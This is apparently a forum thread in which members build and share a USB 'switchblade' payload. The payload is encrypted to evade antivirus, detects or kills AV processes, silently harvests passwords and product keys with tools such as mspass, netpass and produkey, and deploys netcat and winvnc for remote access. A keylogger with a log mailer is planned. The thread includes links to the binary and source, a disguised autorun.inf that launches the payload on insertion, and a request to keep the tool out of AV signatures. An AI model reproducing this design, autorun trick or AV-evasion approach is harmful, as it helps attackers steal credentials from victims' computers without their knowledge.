hexlax's package = encrypted payload + AVkilla

[hexlax]

This package has been updated, please scroll down to view the latest development notes...

Currently, you can take a look at a snapshot: http://rapidshare.com/files/92198408/scancomp.7z.html

or the source: http://rapidshare.com/files/92198966/scanComp-src.7z.html

Both of these files require 7zip for extracting.

[sablefoxx]

Spybot Search and Destroy 1.4 (TeaTimer):  teatime.exe

[sc0rpi0]

-

[hexlax]

here's my list of av processes.

I've also PMed you with the text file

Here is the batch file which is used with pskill [download it from sysinternals]:

http://www.mediafire.com/?ettn2ygez9z

Here is the just the list:

http://www.mediafire.com/?40lxeoj1fol

Great! I'll code this up. I'm going to be using this paradigm:

-ensure admin privs http://support.microsoft.com/kb/q118626/

-load all processes into an array with pslist

-check our known AV processes against the array

-kill the process

[hexlax]

Just an update:

I implemented the AVkill side of the house. I just need to implement the user interface with all the different command line options. Should be completed shortly. From here, we need to test this beast out. So, feel free to hack the source and distribute the executable, but just give me some feedback on what AV's you've tested them on.

I know discretion is too much to ask for regarding this program; however, let's try to keep it out of the AV signatures at least for a little while.

The next step is to port for Vista and XP 64. Does anyone have experience with porting code from 32bit to 64?

[hexlax]

The current snapshot does the following:

-Encrypted Package to thwart AV signatures

-Determines if AV is running, if it is, executes a clean scanning package.

*AV killing is no longer supported, don't ask why, drink bud dry.

Current package includes:

ipconfig /all*

produkey*

net user*

psloggedon*

tracert -h 2*

net view*

cports*

iehv*

iepv

mspass

netcat

winvnc

netpass

pspv

*denotes programs that will run if AV is found; ofcourse this can be all controlled from the config file.

ToDo:

-create U3 image

-implement keylogger service and log mailer

Please give me feedback!

[trustme]

Just add whatever special thing you did in the config settings to the wikis 'package' page and point people there (regarding your post in another thread).

Honestly I don't see a lot of 'new' ideas in the payload, maybe you should try and find something unique, something that has never been done before.  A lot of payloads now seem to have one minor change, and that's it.  Look at all the other recent 'payloads'.  You have the usbdumper payload, which is really a package, the keylogger payload, again just a package, and then you have payloads built around nothing new at all.  The 7zip payload just seems to be an alternate form of already done ideas, encrypting the files, much like the pocket knife payload did.  People need to learn when they only have a package, and are simply wrapping it around or sticking it in a vanilla generic switchblade payload.  I'm not saying that anyone should stop working on their own personal payload, they can do whatever they want, and I'm sure someone will learn something along the way, however, it might be worth it to think about whats been done already before cloning off already existing payloads.

Sorry about all the commas/run on sentences....

[hexlax]

Just add whatever special thing you did in the config settings to the wikis 'package' page and point people there (regarding your post in another thread).

Honestly I don't see a lot of 'new' ideas in the payload, maybe you should try and find something unique, something that has never been done before.  A lot of payloads now seem to have one minor change, and that's it.  Look at all the other recent 'payloads'.  You have the usbdumper payload, which is really a package, the keylogger payload, again just a package, and then you have payloads built around nothing new at all.  The 7zip payload just seems to be an alternate form of already done ideas, encrypting the files, much like the pocket knife payload did.  People need to learn when they only have a package, and are simply wrapping it around or sticking it in a vanilla generic switchblade payload.  I'm not saying that anyone should stop working on their own personal payload, they can do whatever they want, and I'm sure someone will learn something along the way, however, it might be worth it to think about whats been done already before cloning off already existing payloads.

Sorry about all the commas/run on sentences....

Did you actually look at the source? It's not something that I can just post because the AV detection is c++ coded. As for the payload, I agree with you that it's not new. But this package addresses the issue that people have brought up time and time again:

-AV detection

-package encryption

[sablefoxx]

h0t  :-P

[trustme]

Did you actually look at the source? It's not something that I can just post because the AV detection is c++ coded. As for the payload, I agree with you that it's not new.

Post the C++?  Or an example of what the C++ contains?

[hexlax]

Post the C++?  Or an example of what the C++ contains?

Sure if we want to dissect the whole code, but as the first post indicates you can grab the source from here:

http://mywebpages.comcast.net/dissoluten/scanComp-src.7z

As far as the mechanics behind the AV detection:

-inputs a list of known AV processes from config.txt (sorted)

-grabs a list of current system processes using sysinternals pslist

-takes the current process list and binary searches for each against our known AV list

(since logarithmic time is better than linear)

-if nothing is found, executes the full payload

-if not, executes a payload that scans cleans

-the payload switch is determined in the config.txt file as Y/N, converted to boolean on input

Does that answer your question? What I might do, based on feedback, is code a 'light' version of the AV detection for other packages - if other's are interested. But please have a look at the source - I commented the hell out of it.

[HarshReality]

With reguard to 64 bit conversion... not really needed as 32 bit applications run fine for the most part (unless they are some form of system process). If its of interest I have Vista 64 bit running on my... 3 rd partition I'd be happy to run anything you'd like by it. Just drop me a PM with the method you'd like it ran and where to get it.

[hexlax]

With reguard to 64 bit conversion... not really needed as 32 bit applications run fine for the most part (unless they are some form of system process). If its of interest I have Vista 64 bit running on my... 3 rd partition I'd be happy to run anything you'd like by it. Just drop me a PM with the method you'd like it ran and where to get it.

I would greatly appreciate it! Here is the executable:

http://mywebpages.comcast.net/dissoluten/scancomp.7z

And just run scancomp after you 7zip extract.

[HarshReality]

Ran on Vista Business 64 bit and AVG with no flags. Although I think some of the packages (such as Produkey) are not vista compatible so we might need to look there before going further.

[beakmyn]

Post the C++?  Or an example of what the C++ contains?

Sure if we want to dissect the whole code, but as the first post indicates you can grab the source from here:

http://mywebpages.comcast.net/dissoluten/scanComp-src.7z

As far as the mechanics behind the AV detection:

-inputs a list of known AV processes from config.txt (sorted)

-grabs a list of current system processes using sysinternals pslist

-takes the current process list and binary searches for each against our known AV list

(since logarithmic time is better than linear)

-if nothing is found, executes the full payload

-if not, executes a payload that scans cleans

-the payload switch is determined in the config.txt file as Y/N, converted to boolean on input

Does that answer your question? What I might do, based on feedback, is code a 'light' version of the AV detection for other packages - if other's are interested. But please have a look at the source - I commented the hell out of it.

Why go through all that? I already do something similar in my vbs script of the payload. I have a watchdog timer that looks for a certain process using WMI and kills it. I'll code up a new option to disable AV based on process name and add it to my payload script. I do like the encryption aspect. But if the files are on a read only partition on a U3 drive the AV can't delete it and since you're killing the AV the encryption is a moot point.

[FlaRG*]

Hey Hexlax, Please can you get those links working. When accessed the pages says:

"Sorry, the page you were looking for could not be found.

Suggested Actions:

Check the URL that you have typed and retry."

Thanks.

[hexlax]

Hey Hexlax, Please can you get those links working. When accessed the pages says:

"Sorry, the page you were looking for could not be found.

Suggested Actions:

Check the URL that you have typed and retry."

Thanks.

Done...

Thanks for the heads up. Oh, and F*** Comcast for dropping the link.

[FlaRG*]

Done...

... You are wonderful!!

[FlaRG*]

I have a querry... Take a non-U3 USB Stick.

All of the contents of hexlax's sanComp.rar file have been extracted within (logs, payload, tools, config.txt, scanComp.exe) plus another file, named icons with a hdsymbol.ico, in the root of the usb stick.

I created an autorun file as follows:

[autorun] 
action=Open Folder
icon=iconshdsymbol.ico
shellexecute=scancomp.exe
label=MyPortableHDD

shellOwn This Computercommand=scancomp.exe

All works according to plan, however is there a way that I can get the explorer to come up too? Instead/aswell as the console window?

Many thanks in advance.

[sc0rpi0]

I have a querry... Take a non-U3 USB Stick.

All of the contents of hexlax's sanComp.rar file have been extracted within (logs, payload, tools, config.txt, scanComp.exe) plus another file, named icons with a hdsymbol.ico, in the root of the usb stick.

I created an autorun file as follows:

[autorun] 
action=Open Folder
icon=iconshdsymbol.ico
shellexecute=scancomp.exe
label=MyPortableHDD

shellOwn This Computercommand=scancomp.exe

All works according to plan, however is there a way that I can get the explorer to come up too? Instead/aswell as the console window?

Many thanks in advance.

Haven't actually tried this, but according to spektormax, this should do it.

Of course, this is assuming that you are trying to pop up the explorer window of the drive.

[shadow=red,left]ping -n 5 localhost > NUL

start

nircmd.exe win max ititle "Removeable"[/shadow]

[hexlax]

All works according to plan, however is there a way that I can get the explorer to come up too? Instead/aswell as the console window?

This becomes tricky because you never know what drive letter will be assigned on a foreign computer, but you can call explorer with any directory of your choosing:

::test.bat

explorer C:WindowsSystem32

::end

However, there are some vbs scripts floating around (check the hacksaw package) that, given a file that exists on the usb drive, iterates the drive letters until it exists. I am currently cleaning this project up and will post the U3 ISO and nonU3 images soon...

[sc0rpi0]

Include this "code" into your switchblade [go.bat I think]

It outputs the name of the drive [which has just been inserted] into a batch file which is then run, popping up the explorer window.

No vbscripts are necessary.

::[open.bat]

echo explorer "%~d0" >"c:driveletter.bat"

"c:driveletter.bat"

ping -n 5 localhost > NUL

del "c:driveletter.bat"

Hope this helps.

[hexlax]

Include this "code" into your switchblade [go.bat I think]

It outputs the name of the drive [which has just been inserted] into a batch file which is then run, popping up the explorer window.

No vbscripts are necessary.

::[open.bat]

echo explorer "%~d0" >"c:driveletter.bat"

"c:driveletter.bat"

ping -n 5 localhost > NUL

del "c:driveletter.bat"

I couldn't recreate the process above. What does the piping to NUL accomplish?

I think a simple prog is in order that given a known filename on our USB stick will output the drive letter associated, like:

Input:

C:> findDrive go.bat

Output:

G:

[sc0rpi0]

Include this "code" into your switchblade [go.bat I think]

It outputs the name of the drive [which has just been inserted] into a batch file which is then run, popping up the explorer window.

No vbscripts are necessary.

::[open.bat]

echo explorer "%~d0" >"c:driveletter.bat"

"c:driveletter.bat"

ping -n 5 localhost > NUL

del "c:driveletter.bat"

I couldn't recreate the process above. What does the piping to NUL accomplish?

I think a simple prog is in order that given a known filename on our USB stick will output the drive letter associated, like:

Input:

C:> findDrive go.bat

Output:

G:

Forget the NUL completely. Will not affect it whatsoever. By all means, take it out!

As for the %~d0 wild card, that merely represents the letter the drive letter the program is running off.

Whatever driveletter the program is run off, that's what that will be.

It is piped out to a file which then opens the root directory of the drive

[GonZor]

I think alot of people have asked the question "How do I detect which drive letter is the USB?" I settled on the VBS version, I originally tried a bat version but it can create a lot of errors the only disadvantage to VBS is the target computer may have the WSH disabled. Checkout my payload for my script.